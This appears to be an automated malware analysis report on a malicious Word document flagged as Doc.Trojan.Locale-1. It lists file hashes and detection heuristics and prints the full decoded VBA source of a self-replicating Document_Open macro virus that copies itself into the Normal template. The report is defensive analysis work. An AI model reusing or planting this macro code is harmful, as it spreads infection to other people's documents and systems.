Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 df081bd62b71d53c…

MALICIOUS

Office (OLE)

27.5 KB Created: 2014-03-05 08:20:00 Authoring application: Microsoft Office Word First seen: 2015-09-14
MD5: 004d8e371357f50478f2ec9c084a8cb0 SHA-1: 8b75ea3bf8e3d1b960eefd5e63f2b0ed55bd8610 SHA-256: df081bd62b71d53c5c5cb10a5f1cf041b9e9e28e72646404e1aea47d67b38b0a
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Word document containing VBA macros, specifically a Document_Open macro designed to execute malicious code upon opening. The macro appears to be designed to copy itself and potentially download or execute further payloads, indicated by the ClamAV detection as Doc.Trojan.Locale-1. The document body discusses local beef market issues, likely as a lure to encourage macro execution.

Heuristics 3

  • ClamAV: Doc.Trojan.Locale-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Locale-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1650 bytes
SHA-256: 0aa804957b1d57d1316720506c0f2a6df46b58340977bdf9c2ae0c19fef2a07b
Detection
ClamAV: Doc.Trojan.Locale-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Set NewDocument = Documents(1)
    nextRoutine = "Document_Open"
    
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
    
    With nextDocument.VBProject.VBComponents
        For i = 1 To .Count
            If .Item(i).Type = 100 Then
                With .Item(i).CodeModule
                    If Not .Find("Sub " + nextRoutine + "()", 1, 1, .CountOfLines, 10) Then
                        With prevDocument.VBProject.VBComponents.Item(1).CodeModule
                            codeString = .Lines(.ProcStartLine(nextRoutine, vbext_pk_Proc), .ProcCountLines(nextRoutine, vbext_pk_Proc))
                        End With
                    End If
                    .AddFromString codeString
                    .ReplaceLine 1, "Private Sub " + nextRoutine + "()"
                    If prevDocument Is NormalTemplate Then
                        .ReplaceLine 5, "    Set prevDocument = ActiveDocument"
                        .ReplaceLine 6, "    Set nextDocument = NormalTemplate"
                    Else
                        .ReplaceLine 5, "    Set prevDocument = NormalTemplate"
                        .ReplaceLine 6, "    Set nextDocument = newDocument"
                    End If
                End With
            End If
        Next
    End With
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.